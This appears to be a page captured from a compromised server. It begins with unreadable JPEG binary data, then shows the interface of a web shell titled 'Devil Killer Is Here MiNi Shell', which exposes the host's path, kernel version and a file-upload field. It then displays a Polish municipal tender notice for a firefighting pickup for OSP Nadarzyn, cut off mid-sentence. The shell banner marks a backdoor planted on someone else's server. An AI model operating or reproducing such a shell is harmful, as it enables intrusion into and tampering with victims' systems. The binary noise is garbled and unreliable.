JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211115/0026891101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa samochodu specjalnego pożarniczego rozpoznawczo-ratowniczego dla OSP Nadarzyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nadarzyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269195</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mszczonowska 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nadarzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-830</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@nadarzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nadarzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa samochodu specjalnego pożarniczego rozpoznawczo-ratowniczego dla OSP Nadarzyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a672c5a3-4620-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00268911</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://nadarzyn.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://nadarzyn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji elektronicznie na adres e-mail: przetargi@nadarzyn.pl <br/>lub mciarka@nadarzyn.pl lub za pośrednictwem Platformy znajdującej się pod adresem: https://nadarzyn.ezamawiajacy.pl w zakładce „Pytania i odpowiedzi”.<br/>2. Ogólne zasady korzystania z Platformy:<br/>- zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://nadarzyn.ezamawiajacy.pl lub https://oneplace.marketplanet.pl,<br/>- Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta,<br/>- rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych, dlatego też Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej,<br/>- Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. <br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w sposób opisany w pkt. 2,<br/>- Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Składany wniosek można przesłać za pośrednictwem Platformy Zakupowej w zakładce &#34;ZADAJ PYTANIE&#34;. W celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić wszystkie dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ. Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;. Zamawiający udzieli niezwłocznie odpowiedzi, jednak nie później niż na 2 dni przed upływem terminu składania ofert albo ofert podlegających negocjacjom, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania odpowiednio ofert albo ofert podlegających negocjacjom.<br/>- Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z Centrum Wsparcia Klienta, dostępne codziennie od poniedziałku do piątku w godz. od 9.00 do 17.00 pod nr tel. 22 257 22 23 lub oneplace@marketplanet.pl <br/>- korzystanie z Platformy jest bezpłatne.<br/>3. Wymagania techniczno - organizacyjne umożliwiające pracę na Platformie Zakupowej:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemow operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje,<br/>- zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0,<br/>- włączona obsługa JavaScript,<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>4. Zamawiający określa dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: pdf., excel., doc., zip.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych, tj. plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>6. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Instytutu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 oraz art. 14 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, dalej: RODO), Urząd Gminy Nadarzyn informuje, że: <br/>−	Administratorem Pani/Pana danych osobowych jest: Gmina Nadarzyn zwana dalej administratorem, reprezentowana przez Wójta Gminy Nadarzyn, ul. Mszczonowska 24, 05-830 Nadarzyn, tel. 227298185, fax. 227298175, e-mail: gmina@nadarzyn.pl, ePUAP: /8420yasifl/SkrytkaESP <br/>−	Dane kontaktowe Inspektora Ochrony Danych - rodo@nadarzyn.pl <br/>−	Pani/Pana dane osobowe są przetwarzane w celu wypełnienia obowiązku prawnego ciążącego na administratorze oraz wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej administratorowi,<br/>−	Podstawą prawną przetwarzania danych osobowych jest obowiązek prawny ciążący na administratorze, wynikający z przepisów prawa, nakładający obowiązek realizacji konkretnego zadania,<br/>−	Podanie danych osobowych jest dobrowolne, ale konieczne do realizacji celu ich przetwarzania, a konsekwencją ich niepodania będzie niemożliwość realizacji zadania,<br/>−	Dane osobowe będą przetwarzane przez okres realizacji danego zadania oraz zgodnie z przepisami dotyczącymi archiwizacji, <br/>−	Przetwarzane dane osobowe mogą być pozyskiwane od osoby, której dane dotyczą, a także ze źródeł publicznie dostępnych oraz od organów administracji publicznej, innych podmiotów i osób fizycznych zobowiązanych do przekazania danych osobowych,<br/>−	Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora posiadających uprawnienia do ich przetwarzania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">−	Przysługuje Pani/Panu prawo do żądania od administratora:<br/>-	dostępu do swoich danych osobowych,<br/>-	ich sprostowania,<br/>-	ograniczenia ich przetwarzania,<br/>-	usunięcia,<br/>-	przeniesienia danych do innego administratora danych osobowych,<br/>-	wniesienia sprzeciwu.<br/>−	W przypadku przetwarzania danych osobowych na podstawie zgody przysługuje Pani/Panu prawo do wycofania w dowolnym momencie zgody na ich przetwarzanie, przy czym wycofanie zgody nie ma wpływu na zgodność z prawem dotychczasowego przetwarzania.<br/>−	Przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/>−	Pani/Pana dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPiFZ.271.25.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dostawę fabrycznie nowego samochodu z uwzględnieniem pkt 1, spełniającego następujące minimalne warunki:<br/>1)	Wymagania dla pojazdu:<br/>a)	samochód musi być min. 5 osobowy (z kierowcą) i fabrycznie nowy, tj. wyprodukowany nie wcześniej niż w 2020 r.,<br/>b)	samochód bazowy musi posiadać świadectwo homologacji typu lub świadectwo zgodności WE,<br/>c)	samochód musi spełniać wszystkie wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z:<br/>- ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz. U. z 2021 r. po. 450, 463, 694, 720, 1641),<br/>- rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016 r. poz. 2022, ze zm.),<br/>d)	oznakowanie pojazdu musi być zgodne z Zarządzeniem Nr 1 Komendanta Głównego Państwowej Straży Pożarnej z dnia 24.01.2020 r. w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej (numery operacyjne zostaną podane po podpisaniu umowy),<br/>e)	w przypadku przekroczenia Maksymalnej Masy Rzeczywistej powyżej 3 000 kg, Zamawiający wymaga dostarczenia świadectwa dopuszczenia do użytkowania w ochronie przeciwpożarowej zgodnie z przepisami ustawy z dnia 24 sierpnia 1991 r. o ochronie przeciwpożarowej (Dz. U. z 2021 r. poz. 869) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. <br/>z 2007 r. Nr 143 poz. 1002, ze zm.);<br/><br/>2)	Podstawowe parametry napędu/podwozia:<br/>a)	silnik z zapłonem samoczynnym z turbodoładowaniem, moc min. 200 [KM], moment obrotowy min. 400 Nm, pojemność min. 1950 dm3,<br/>b)	skrzynia biegów min. automatyczna,<br/>c)	napęd 4x4 z odłączanym napędem osi przedniej. Blokada min. tylnego mechanizmu różnicowego. Osłona silnika i skrzyni rozdzielczej – stalowa,<br/>d)	dopuszczalna masa całkowita max. 3500 [kg],<br/>e)	zbiornik paliwa o pojemności min. 75 l.,<br/>f)	felgi aluminiowe fabryczne z oponami typu AT min. 17”,<br/>g)	prześwit pod osią przednią i tylną min. 220 mm.,<br/>h)	kąt natarcia 28⁰,<br/>i)	kąt zejścia (bez haka) min. 25⁰;<br/><br/>3)	Podstawowe parametry nadwozia/pojazdu:<br/>a)	kolor nadwozia – czerwony. Zderzaki lakierowane w kolorze nadwozia. Dopuszcza się nakładki na zderzaki w kolorze chromu,<br/>b)	wymiary pojazdu [mm]:<br/>- długość - min. 5200 mm.,<br/>- wysokość całkowita bez obciążenia - min. 1800 mm.,<br/>- rozstaw osi - min. 3000 mm.,<br/>- szerokość - min. 1800 mm.,<br/>- minimalny promień skrętu nie większy niż 6,5 m.,<br/>- głębokość brodzenia pojazdu min. 800 mm.,<br/>- wymiary przestrzeni ładunkowej - co najmniej dł. 1500 x szer. 1500 mm.<br/>c)	konstrukcja pojazdu o nadwoziu samonośnym, czterodrzwiowym z paką typu Pick-Up,<br/>d)	lusterka zewnętrzne elektrycznie regulowane, składane i ogrzewane,<br/>e)	pełnowymiarowe koło zapasowe;<br/>f)	światła przeciwmgielne przednie i tylne. Światła do jazdy dziennej. Reflektory w technologii LED,<br/>g)	system zapobiegający blokowaniu kół podczas hamowania [ABS], system stabilizacji toru jazdy [ESP], system optymalizacji przyczepności podczas przyśpieszania [ASR], system wspomagający ruszanie z miejsca na wzniesieniach;<br/><br/>4)	Wyposażenie pojazdu:<br/>a)	szyby boczne w kabinie sterowane elektrycznie. Dopuszcza się pojazd z elektrycznie sterowanymi szybami części przedniej kabiny i manualnie sterowanymi w części tylnej kabiny, <br/>b)	centralny zamek sterowany z pilota. Immobiliser,<br/>c)	poduszki powietrzne w kabinie kierowcy - min. przednie i boczne dla kierowcy i pasażera, kurtyny powietrzne, poduszka kolanowa kierowcy, trzypunktowe pasy bezpieczeństwa dla wszystkich miejsc,<br/>d)	wspomaganie kierownicy. Kierownica wielofunkcyjna, umożliwiająca obsługę radia. Kolumna kierownicy z regulacją w minimum jednej płaszczyźnie. <br/>e)	wszystkie fotele wyposażone w zagłówki z regulacją wysokości, wszystkie siedzenia przodem do kierunku jazdy. Podłokietnik z przodu. Kolor foteli pasażerskich oraz wnętrza przestrzeni pasażerskiej w ciemnym kolorze, siedzenia wyłożone tapicerką z tkaniny odpornej na uszkodzenia i łatwą w czyszczeniu,<br/>f)	klimatyzacja,<br/>g)	głośniki z rozprowadzoną instalacją elektryczną rozmieszczone w pojeździe. Instalacja radiowa wyposażona w antenę. Radioodtwarzacz z gniazdem USB oraz systemem Bluetooth wyświetlacz minimum 8”,<br/>h)	deska rozdzielcza wyposażona w prędkościomierz, obrotomierz, wskaźnik poziomu paliwa, komputer pokładowy itp.,<br/>i)	trzecie światło stop,<br/>j)	uchwyt holowniczy z przodu pojazdu,<br/>k)	przestrzeń bagażowa pojazdu wykończona materiałem antypoślizgowym,<br/>l)	na wyposażeniu: zestaw narzędzi, podnośnik samochodowy, klucz do kół, trójkąt ostrzegawczy, gaśnica proszkowa min. 1 kg,<br/>m)	hak holowniczy fabryczny, homologowany, kulowy, z wyprowadzoną instalacją elektryczną <br/>i gniazdem 13-pinowym do podłączenia przyczepy o masie wynoszącej wraz z hamulcem 3500 kg zgodnie ze świadectwem WE,<br/>n)	gniazda 12 V - 2 szt. w przedziale kierowcy oraz gniazdo elektryczne 12V w przedziale bagażowym – 1 szt.,<br/>o)	w kabinie kierowcy 1 radiotelefon przewoźny wraz z kompletną instalacją antenową. Radiotelefon o parametrach: częstotliwość VHF 136-174 MHz, moc 1 - 25 W, odstęp międzykanałowy 12,5 kHzw trybie cyfrowym i analogowym, min. 160 kanałów. Wyświetlacz alfanumeryczny + ikony stanu pracy radiotelefonu, <br/>- radiotelefon analogowo-cyfrowy (dwie szczeliny TDMA),<br/>- cztery programowalne przycisków funkcyjne,<br/>- zdalne programowanie drogą radiową:<br/>• blok nadawczo-odbiorczy z wyświetlaczem,<br/>• antena samochodowa na pasmo pracy radiotelefonu + wtyk,<br/>• uchwyt,<br/>• instrukcja obsługi w języku polskim do radiotelefonu z gwarancją na okres min. 24 miesięcy (miejsce montażu anteny oraz radiotelefonu należy uzgodnić z Zamawiającym),<br/>• belka sygnalizacyjna na dachu pojazdu – LED’owa niskoprofilowa (wysokość profilu lampy max. 70mm), wyposażona w światło barwy niebieskiej oraz szyld podświetlany STRAŻ barwy czerwonej (podświetlenie LED’owe), długość lampy dostosowana do szerokości dachu pojazdu, lampa nie może wystawać poza obrys dachu pojazdu,<br/>• dwie lampy LED do przodu pojazdu zamontowane w przedniej atrapie pojazdu,<br/>• głośnik o mocy minimum 100W zamontowany w przedniej atrapie pojazdu,<br/>• wzmacniacz sygnału dźwiękowego o mocy minimum 100W dedykowany do współpracy z zastosowanym głośnikiem, z możliwością podawania komunikatów słownych na zewnątrz, generujący sygnały o zmiennym tonie ( minimum 3 sygnały o zmiennym tonie, zmian modulacji po uruchomieniu klaksonu pojazdu),<br/>Sygnalizacja świetlna i dźwiękowa pochodząca od jednego producenta. <br/>Zgodność z wymaganiami ustawowymi tj. homologacja na zgodność z R65 EKG/ONZ dla światła oraz R10 EKG/ONZ dla światła oraz wzmacniacza sygnałowego. <br/>Efektywność sygnalizacji dźwiękowej (wzmacniacz z głośnikiem) minimum 115dBA z 3-ech metrów bądź 110dBA z 7-miu metrów – poziom ekwiwalentny.<br/>Miejsce zamocowania sterownika i mikrofonu w kabinie zapewniające łatwy dostęp dla kierowcy oraz dowódcy (optymalnie w podsufitce dachowej) - do uzgodnienia z Zamawiającym w trakcie realizacji zamówienia.<br/><br/>p)	samochód wyposażony w główny wyłącznik, umożliwiający odłączenie akumulatora od wszystkich systemów elektrycznych (z wyjątkiem tych, które wymagają stałego zasilania). Wyłącznik główny powinien znajdować się w zasięgu kierowcy,<br/>q)	ZABUDOWA HARDTOP – pokrycie przestrzeni ładunkowej, Przestrzeń bagażowa pojazdu wykończona materiałem antypoślizgowym. Zabudowa skrzyni ładunkowej hardtop na całej jej długości w kolorze samochodu z możliwością łatwego dostępu do wnętrza przestrzeni ładunkowej przez trzy klapy (dwie boczne i tylną), klapy otwierane do góry unoszone przy pomocy amortyzatorów gazowych. Zabudowa wykonana z laminatu. Wysokość wewnętrzna pod zabudową hardtopem minimum 1000 mm.,<br/>r)	gaśnica proszkowa o masie środka gaśniczego 1 kg – przewożone w pojeździe<br/>s)	ORUROWANIE PRZEDNIE ze stali nierdzewnej,<br/>t)	wyciągarka elektryczna zamontowana w części przedniej pojazdu - w sposób nie wystający poza wymiary zewnętrzne pojazdu – jedynie prowadnica rolkowa. Moc silnika wyciągarki minimum 120% DMC pojazdu,<br/>u)	lampa dalekosiężna led –off road o mocy minimum 25W zamontowana na orurowani przednim,<br/>v)	dodatkowe zabezpieczenie antykorozyjne podwozia;<br/><br/>5) Pozostałe warunki:<br/>a) Wykonawca udzieli co najmniej 2 letniej mechanicznej gwarancji jakości i rękojmi za wady bez limitu kilometrów,<br/>b) Wykonawca udzieli co najmniej 2 letniej gwarancji jakości i rękojmi za wady na lakier bez limitu kilometrów,<br/>c) Wykonawca udzieli co najmniej 10 letniej gwarancji jakości i rękojmi za wady na perforację bez limitu kilometrów,<br/>d) zużycie paliwa w cyklu miesięcznym – maksymalnie 10 l./100 km. (pojazd zostanie wydany Zamawiającemu z pełnym zbiornikiem paliwa).<br/><br/>3. Wykonawca zobowiązany jest do dostarczenia wraz z samochodem:<br/>1) instrukcji obsługi samochodu w języku polskim;<br/>2) dokumentacji niezbędnej do zarejestrowania samochodu jako pojazd specjalny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przewiduje zaproszenie do negocjacji 3 Wykonawców, którzy złożyli oferty niepodlegające odrzuceniu, spełniające w najwyższym stopniu kryteria oceny ofert. W przypadku skorzystania przez Zamawiającego z możliwości negocjowania treści ofert, negocjacje nie mogą prowadzić do zmiany treści SWZ oraz dotyczyć będą wyłącznie tych elementów treści ofert, które podlegają ocenie w ramach kryteriów oceny ofert.<br/><br/>Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria oceny ofert. Oferta wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę punktów. Pozostałym ofertom, wypełniającym 